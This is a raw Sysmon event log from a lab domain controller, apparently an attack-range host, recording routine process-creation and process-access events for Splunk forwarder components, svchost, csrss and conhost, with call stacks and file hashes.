Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8F66-6005-F500-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.456{59A5CD1D-8F67-6005-F600-00000000A301}48484840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F67-6005-F600-00000000A301}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F67-6005-F600-00000000A301}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F67-6005-F600-00000000A301}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.317{59A5CD1D-8F67-6005-F600-00000000A301}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.831{59A5CD1D-8F68-6005-F800-00000000A301}8844740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F68-6005-F800-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F68-6005-F800-00000000A301}884C:\Program 
